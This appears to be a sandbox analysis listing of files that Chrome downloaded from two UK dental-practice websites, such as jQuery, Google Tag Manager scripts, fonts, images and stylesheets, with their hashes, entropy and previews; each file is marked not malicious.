                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):69597
                                                                                                                                      Entropy (8bit):5.369216080582935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                      MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                      SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                      SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                      SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                                      Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (4179)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):243404
                                                                                                                                      Entropy (8bit):5.563044879701886
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:utOhzgNSNow8VNz381b8C71+TYc20DCSY1KGoIb1QWDe5L+aVsQCh/AmN8LMjPdK:5hewMNz3mqwhDe5LfV9CFTN8MQ
                                                                                                                                      MD5:84F35CF8C5B80D654D789A8300A9747C
                                                                                                                                      SHA1:4B016021C7ED8F3294D5C65BB00A1121841A23CA
                                                                                                                                      SHA-256:6D6B1E1011ACC6C23A5638E855EA02DFE7D15F4C7334F2C682C3C06EB1F34E32
                                                                                                                                      SHA-512:69728B62F5CD306E25BDAE3862A7EF34D99AF62A1D74BD82A8A25FC76CD4719C717E2BBF21445746A8570059456471DFCC8544455F3D94B0DB82F240A48427AF
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=G-BW7F70S0MZ&l=dataLayer&cx=c
                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":16},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","exodontia\\.info"],"tag_id":18},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":19},{"function":"__ogt_1p_data_v2","priority":6,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SEL
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):77
                                                                                                                                      Entropy (8bit):4.4253877617447435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:kCOS8u4WX4X7j7CyUVWRm9IMy90AcX4:LOluKCVWRm9xNT4
                                                                                                                                      MD5:0097A51F2310BE5AB946A06FD32FA533
                                                                                                                                      SHA1:6B4FCEDD3026B4021F062F7F84881F17BAAAA732
                                                                                                                                      SHA-256:1C8998B466A9C3B3F2450DAA3C5E35683C2F9EDEFBBFB717C12311EEFEEFB0D7
                                                                                                                                      SHA-512:6B97005B16CDBF52D20779F07A114AAD8D14BA55C7CA64896FE7EDE136EB63E37347E1EC23FD774C58F0EA09E3D7652C088BFAF47543B796E47924F6E8BF0562
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:"https://www.google.com/maps/embed/v1/place?key=AIzaSyCeLSdqTKK24QTZ2fgw9w5olAcpwi4Hbw0&q=52.620904,+-2.129217"
                                                                                                                                      Preview:Google Maps Platform rejected your request. The provided API key is invalid.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 225 x 226, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6588
                                                                                                                                      Entropy (8bit):7.90682636690657
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:nSmzoMFNZ4Exkqj2V01P9RFeKjbVCtJJHXhgnndHNQtKCPPfzofmYIGJScfTg8Qu:SA9x1HKKj4H+nnzlyDdVcfTgjvFwN
                                                                                                                                      MD5:607EA8ADF895376E8AEFE11D23AA76F1
                                                                                                                                      SHA1:A3D5432534D2EA806A39C91124EE16C7E0E2B858
                                                                                                                                      SHA-256:2B6C5165029BE100337B9BD0248B8068FF5593B2B063B520C1E65EB83A9C10B6
                                                                                                                                      SHA-512:539A43F0E43299F0EFF807D95B606D1540E41048EE34699C48DCD6590D510B72E36368FD39CC85F823A87FA4B0E4BE59F06DDE53DE9127CE09158272294EBC28
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR..............'......tEXtSoftware.Adobe ImageReadyq.e<...^IDATx..}pU..Kx./M./.."...h|.X.@....fw.@...t.-K..t...cw.U...3*8[.uw5T...% T...P..0.. ..%..K..r.....>/.<.9......}99.|./.K.A.ja.<..A.Xb.%..(K^H.....:^...'7.J.......)a..t..... L.r...q..!$.@.a.uT....B....*\=@.).0.....B....B...!.......0O..@....\Y@...`..%..o....c>@..Pn..k=<....BHj.....u......J..B.).B.9a..b..8 ...Wb....=..BG.,.W...B.....v..D.I..+6.7...~rJ.B...0..Q.s5..~..BG56.......~?.u?E.:.H..5.m.. .H....P..y%C.\.....r;......A.fb.B...M.....z...+.6..P.Q....H......,@...T.:e..{.......{..x...h.".E@.....xW.Z7.f...)'.F.,.H..&+.@loS.Q....P'.(.{Pe....[.}...@H"'$...{..;J.....Lb9.@.[.I..C&..o.G.G...t..m~.:....P..u4......<.t...=.....,...O.0..Zy.xI.j.c.......2..r._...-{$..A.Cx.V..;..H@.....lqG{_o...@.G........ t.}s*<....@....\F@.5.c.S.T/....Cy`...!.........E..Z..F..2....J....B..B.\1..{..0.>"... ...<+..j...:...r....o=......hC..ME.../...L6..lc.s..P.iR.+o9rI.vc.s.3..S.a.?f.|....!+4.Y....
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 10700, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):10700
                                                                                                                                      Entropy (8bit):7.978541434723804
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:qh8tGalRmmJtK7cbUSdeXAUmgN4WQ6/BO7i75TMvj4gpI0Nf6U:qw3qmJtKwUSIXAUmtWQEQEoLNz
                                                                                                                                      MD5:9F304B9795B0BC3485C137429708BB3F
                                                                                                                                      SHA1:48467237B684A1619CF404E169A8202E93DA12A9
                                                                                                                                      SHA-256:64E453A02CF92646DF93AFA463467837FC2ADDB1CD81417B304784C88A194298
                                                                                                                                      SHA-512:623E8B64CEC5298A9161F856A1B1E0636DD2B3B21580FF3CBBF301E4A5517167F253BCCED7F17D67F9C47AEE3588C17371AB4F707BD8A23FDFB803F28DAC209A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWT4ewJER.woff2
                                                                                                                                      Preview:wOF2......).......MH..)d.........................(....r.`?STATZ.....8.......,.j..v..6.$..V. ..\..V.....E5x.D~........6...o............"..Q...m40e%..F.DeP.. .-[.p...Y....d..,.Q..i..l...l5.|-J~M......d.....K.a..Z}...i../X.....7....gt.i.<.W.hh$1A..,.PB.@.X...j.bY..[.(..........c......6.....DY(-.J(b.S..X..7{...]......4.)].Z.\e{w].).......H..t..xK........{...Ac...3^J..Z."\.....;)E\....^'s.@~..9m'....I.^............##.g"......)X....<i..]..k.U...vX.....u....EK......q..._..*8....@@..t......sY....nQL..&I..Wf.....l`*..p...g.^.4.g.....rMY.(S.!H6.. .wn?u..ZR...R.?.......>i.03Kc.l.PZ.,Rd..0.....]N"..:..e.9...S../..........CZ.....e.6.B...1.....(..i..X.......0.....w.t.B714....-m..v....p.b......a&.a......wz.i.......fk....i|.,.K]...T>.Ti.RN.G.=.fu...ldr..j~6..W..%.~3...i..;..4315.P...6..G6..J...z<........jT....X.....T..B.~...].L...v.].Y.b\^.9.X.0...K..r..^.{k....RJ.S..Qi..j......3... k.A.emg.b^......r>.1...t.X..qp...g....O..m.*~4.v.....!.~....b+P.O.......z.d..L......])D.a.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (516)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):22765
                                                                                                                                      Entropy (8bit):5.1833885376847855
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:xRgNjmuIGO0y1GluPXR9GF0uWYf0CWB07Es9kBf594:xRgNjmuIGOn1GluPXR9GFVWYf0CWBKEA
                                                                                                                                      MD5:021E5C95C5C2C1B3B188E8B0AE44B93E
                                                                                                                                      SHA1:BF885A283EAF708A88AA254FA6E333BC7B30536F
                                                                                                                                      SHA-256:C7E37977E088AC86EB1C883788D8C421AD18EA61E066F505211E636DE5BC4530
                                                                                                                                      SHA-512:DA0774E9B78DD78D786AF5B25A599F86BEAD80A0F63C8CEA6051098CF9523074FDBB6A8871EBCBF74092F2C62BE3A5FCF386C83D966A1F5522A5A9F677F15521
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://use.typekit.net/aqv2rmz.css
                                                                                                                                      Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * mr-eaves-xl-modern:. * - http://typekit.com/eulas/00000000000000007735b307. * - http://typekit.com/eulas/00000000000000007735b327. * - http://typekit.com/eulas/00000000000000007735b331. * - http://typekit.com/eulas/00000000000000007735b336. * mr-eaves-xl-modern-narrow:. * - http://typekit.com/eulas/00000000000000007735b309. * - http://typekit.com/eulas/00000000000000007735b314. * - http://typekit.com/eulas/00000000000000007735b31f. * - http://typekit.com/eulas/00000000000000007735b324. * - http://typekit.com/eulas/00000000000000007735b328. * - http://typekit.com/eulas/00000000000000007735b32c. * - http://typekit.com/eulas/00000000000000007735b333. * - http://typekit.com/eulas/00000000000000007735b335. * - http:/
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):154921
                                                                                                                                      Entropy (8bit):7.9776507446006
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:koBl3HBYdHyOpguo+Zr+9yDwf4eewiMlKvzUq3pB54kH6+I:7BlIpbi9yDM4UxlVC754kH7I
                                                                                                                                      MD5:B40B1ECA181D5FB3445DAB091876B1FC
                                                                                                                                      SHA1:C93B4DA3502F62C86A446120A27BD59CD4EFE8F3
                                                                                                                                      SHA-256:E955B7796999093B904E59E6C10A7BA84B0B577D57093645CDA898673A62729A
                                                                                                                                      SHA-512:5C570F751491D83DA802C3968E49F70E479440FDE48340CAC6666C63AD9C92D4F04180913AAE055BFB6C50E6BCDA3C34918325AD0347DA6B713FE50BE2C8CAC4
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:34156EFA0CC511E7AF8A8F58BC2A26C9" xmpMM:InstanceID="xmp.iid:34156EF90CC511E7AF8A8F58BC2A26C9" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:fa498863-10d5-4515-bd36-a009af8faf23" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 28224, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):28224
                                                                                                                                      Entropy (8bit):7.992313951609868
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:2tXc58ccT5xYhuN3oONb1IMdwF6eYparW3lkqENNNrCh5mc4i:QMbcT5ToONb1/eYzkDbumU
                                                                                                                                      MD5:6E95E894BF3DAB542264C4BFBE7E677A
                                                                                                                                      SHA1:C5EF8B858CAF7920D451D43F37EA65DE3736716C
                                                                                                                                      SHA-256:EDBF37F6DB3F632FAAEEEEE4AA127C204D0BCC52E940682BC5D4B0FA48DED96B
                                                                                                                                      SHA-512:7604DBEE3125C21EB4557332C22D9024888B1DB44DDB44059296ED4939BEBB0AF82A708F95EA207BF42509E19BD53EBA2099FB4684FA3E940FC9468F86F1021F
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/librefranklin/v14/jizDREVItHgc8qDIbSTKq4XkRiUf2zc.woff2
                                                                                                                                      Preview:wOF2......n@.........m.................................(?HVAR.0.`?STAT..'2..2/~.....p..u....0....6.$..f. ..P..=.......t.@=A..W...M.~.n.0 ...0.T.g...$'c....jf....r..R.............Y{..".0.Xe.4..".....[3v.i.L.1U.D.W.$.R.:.-......P.K....ADh&.'I~S....N.'~.E...j8.....<.k./.-...k.}...!...`.......N..k.".w..-...;........I.P(..s...3.?q....3..!DS+..%OB*.N.O#..\r..k.;.Z....;..P.//......./....g..}h.......Z8=..)..]...p......?.u.....<;~q...b.,.QBT...!n.>..V|.Kd..G.2.].3..1..D.^~=.w.Q!k0.cPd.$N.<B........}.....'qB. x.[..O;._}.&..m.f7..v....f...2e..P.EV,@.%..2. 0.v...=./..oxb* ....|..2....hK.....m..{.-@^.........<\...(]T9W."..G..W..Q. ..2....:`.r...-...D..8.(..%...^....Ep.,.....7.7k.;..Y.>.,.......]8..C....c.4@...T.....P.........\....r8..].......s.2..i..`.N."1.~7..'..]..P.G...(..wiI..n.{}7.......XP..}I.4.....3..y.t.k..:y.\+....P..... ..`....o....w.L...HSBa.........3....m...oY&.uu..$[v6.W......wIG..@.8..?.g......K..Nk.....n.&..j........:...[A...Py<.]z\T$.x.RZAi...[."...
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):25878
                                                                                                                                      Entropy (8bit):5.097761371511872
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:YWMfv/kYxC/L49etG4I9vXjs2SFvXUmt7wL/bbS0kJdGIO1bvKMqhjQuIfrS:1y82oG4IJXjsDTeuvnvOE
                                                                                                                                      MD5:2584B01D3267193A38565538F3EF54A9
                                                                                                                                      SHA1:EAA8D8FDDBF79F4B84D420A1719936280A0B3A7D
                                                                                                                                      SHA-256:821903C628F9A714D4404634F6441FD830DF985E60DAAD9A2E167667320950F9
                                                                                                                                      SHA-512:FE12BD5F233FB83A49ED44A1DAF0FDA71B5337B757AEF61704D97E268FC52BD410D772DEB95EFFC7DD49ECAE29C30B90CD873246C25428C5045C4007F4D90730
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/style.css
                                                                                                                                      Preview:/*.Theme Name: dentalhealthstop.Theme URI: http://verypaulcherry.co.uk.Author: Very Paul Cherry.Author URI: http://underscores.me/.Description: Description.Version: 1.0.0.License: GNU General Public License v2 or later.License URI: LICENSE.Text Domain: dentalhealthstop.Tags:..dentalhealthstop is based on Underscores http://underscores.me/, (C) 2012-2016 Automattic, Inc..Underscores is distributed under the terms of the GNU GPL v2 or later...*/ ..@charset "UTF-8";../* http://meyerweb.com/eric/tools/css/reset/ . v2.0 | 20110126. License: none (public domain).*/..html, body, div, span, applet, object, iframe,.h1, h2, h3, h4, h5, h6, p, blockquote, pre,.a, abbr, acronym, address, big, cite, code,.del, dfn, em, img, ins, kbd, q, s, samp,.small, strike, strong, sub, sup, tt, var,.b, u, i, center,.dl, dt, dd, ol, ul, li,.fieldset, form, label, legend,.table, caption, tbody, tfoot, thead, tr, th, td,.article, aside, canvas, details, embed, .figure, figcaption, footer, header, hgroup, .menu
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (5945)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):252238
                                                                                                                                      Entropy (8bit):5.570717362671479
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:jZp8hzgNSNow8VNz2j1b8T71+TYc20DCSY1KGoIb1QWDe5L+aVsQChFbmN8LMjXX:lqhewMNz2YqwhDe5LfV9C3qN8aAA
                                                                                                                                      MD5:2C41E8045B4ED5E74B3CE5E52C2E0BF7
                                                                                                                                      SHA1:01C50778B994AE6F736B57E70073D931F9149381
                                                                                                                                      SHA-256:29B3CC95D8D2E930B40019CDFFDF4EB6EFA52B87F0D1A6A14062BA24432B4443
                                                                                                                                      SHA-512:3CA884251E5A9C84A9BD993E773A0F8C5BA457F6687060180AC79F580503862B59243CD15C953A63BCD931F936008B0362944E5C90A3D52CCA1194F14AB192FB
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=G-DF396SG33H&l=dataLayer&cx=c
                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"function":"__c","vtp_value":false},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":7,"vtp_value":true,"tag_id":17},{"function":"__ogt_ip_mark","priority":7,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",4],"vtp_enableIpRegex":true,"tag_id":19},{"function":"__ogt_referral_exclusion","priority":7,"vtp_includeConditions":["list","dentalhealthstop\\.co\\.uk"],"tag_id":20},{"function":"__ogt_session_timeout","priority":7,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":21},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list"
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (845), with CRLF, LF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):19525
                                                                                                                                      Entropy (8bit):5.0738656561897875
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:T8PIG5obu0aGheEL9uBhEMsMWIy5VRJoz09RWR8OFez65:buBhEIybnoqWWze
                                                                                                                                      MD5:B3DF10DA94A68245236740D267103D10
                                                                                                                                      SHA1:92C4161E596DFCC27E8580B401BD03BA64AC0E16
                                                                                                                                      SHA-256:0DC58D02ECD2087C666206E60D8CFB8B4DD298EB6EBAE16100ABAFDD3B6F6224
                                                                                                                                      SHA-512:48376C412C9D41D96AB4E073EB8B6B8552E2D56BEB99DC276DA6BD3E671B990380C269971E3ACB765B09696324F55CD4968FC7062B9EA61AAF63D7435B6C8998
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/
                                                                                                                                      Preview:<!DOCTYPE html>.<html lang="en">. <head>. Required meta tags -->. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">. <title>NHS Dentist and Modern Dental Practice in Wolverhampton</title>. <meta name="author" content="Dental Health Stop, 2017. All rights reserved.">. Bootstrap CSS -->. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M" crossorigin="anonymous">.. Cookie Consent-->..<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />..<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js"></script>..<script>..window.addEventListener("load", function(){..window.cookieconsent.initialise({.. "palette": {..."popup": {... "background": "#000000"...},..."bu
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1126
                                                                                                                                      Entropy (8bit):7.759869593332356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2KF9y2x+OGQBLPT6dHkA2AANI6rkYYrY2dW1o9RxFUc7lzwVQ:2iy2j/BL+dNITgYYrY91acYNr
                                                                                                                                      MD5:54B9EA24E227E755A7CFC3C94AAAF196
                                                                                                                                      SHA1:E7A667DBD3CDDF26E6CC1410A76A25BC8B43F653
                                                                                                                                      SHA-256:33D4C34F099388ACC98EB590A9A7789EEE130855A96D45D355D461925BFDF54B
                                                                                                                                      SHA-512:2B9A9E702DF920918B793B76F0C2C0C8D7EF9F191CD483E5B1CE2EBEF0EFDACD45FB67B44774690B098D81B204F462283FCA82DD74DA9D48A34B86E9A7845927
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/images/dhs-icon.png
                                                                                                                                      Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[..0..1...*.;........W@R.P.q....Tp..... >.HV.....[.,4.......$...v.^S.XB_A......v:..I.......\.....n.0.[...............a.zp.0..>......u.8.G^.#.....uL..r8K7".#..>..I#.9.Bw..k.M".7C..#.....jY...G.t+ui...'....D.O......?.<x...6`Q..........~....J[+....o..B.+.."ct.(.~...........T...._ .B...2..#.......C.>..q.. b...){..;...q@-y....3.,.....p.p.EN.."....U\...FZ.y...?...a-{.0.A...p....hHB...p...jL.B..C.. .1n..d.X..[.8...yl.3/.5I ......A.....p...-.........<k=..;.b..`L..U...............UgW....:W.a8...4O..).O.....<sQ.[....__.....S*~.lkh..*b....!.Wa...*..k4.....*.T.r.l.%.\_.r..\.y.`.\..\....C...M.V}S.9.s"qM......7..n.y.j.v..+L..`8.)x.....R....*.dRH...@Y........b.......Qr*."....`T....&.Q.3..^..R.G.W.?..|.+.\3..[%(.....+`e....L".....u...S...:7...hH*.q...N.h..Z.I...[a..7Z...Y.A#.........Dk.s.Xu......J...~..Ys.7........A#.1.pZ.....g..fx....../.{.Cu.7...*H.Fk.qsk....s..&D.8..Z....A.Z...
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (24913)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):204637
                                                                                                                                      Entropy (8bit):5.337513783977985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:KanZeJMTk2u5SOV+UQ37410kTd3Z3PzlI7Jdn:PPTk2u5SOV+UQ37410kTFZrlI7Jdn
                                                                                                                                      MD5:06DCB36AAAD328E8B05B14CE030D1D43
                                                                                                                                      SHA1:655253B32878CBEA74D1AB44A91549A4487578D5
                                                                                                                                      SHA-256:555636A51428F9C4901F05532B93C501D74837D4FBA6301DE788B2FD85185AF3
                                                                                                                                      SHA-512:6EA23BBD9EE1A189533B4C04BBF1D8E7D0634C175BB94FEB54D752E6623D18D019AB27C5A25F82BB90C4D8BE196F6ADAABBD1DCAFAE5F3C69FA0FA21D1EBED57
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/uploads/themify-concate/826651810/themify-4036982551.css
                                                                                                                                      Preview:@charset "UTF-8";./* Themify Shoppe 5.7.0 framework 5.6.4 */./* vietnamese */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zoTjmbI.woff2) format('woff2'); unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}/* latin-ext */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zsTjmbI.woff2) format('woff2'); unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}/* latin */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qD
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (1323)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):3938
                                                                                                                                      Entropy (8bit):4.810660944554395
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:u00LI2I/YPuYLOWjQ0cN7xjXndM78JtdnJZtTJwIjDPZw4zK4cg64cAK4cgD4cp:5kRWYbOiGdTt7ZflBHRaq
                                                                                                                                      MD5:4AFFDA653D65484BF6983822FA6ADB23
                                                                                                                                      SHA1:225DF1E9345D47CF62A552B7E6720BE1E759B49B
                                                                                                                                      SHA-256:456AB1A71507ED91ABAE14C9D08FAFFB373A7BC711A66E44341B7B8B7BB72AB4
                                                                                                                                      SHA-512:B099A8733858188D4E901DF45B4C8243DD64AAD621B1035A552BC5FC58DAE2F23A91FF06C4A517F7E44D17B3CB9667773F9E8C15081EE907FDF10FA3EA218E5B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css
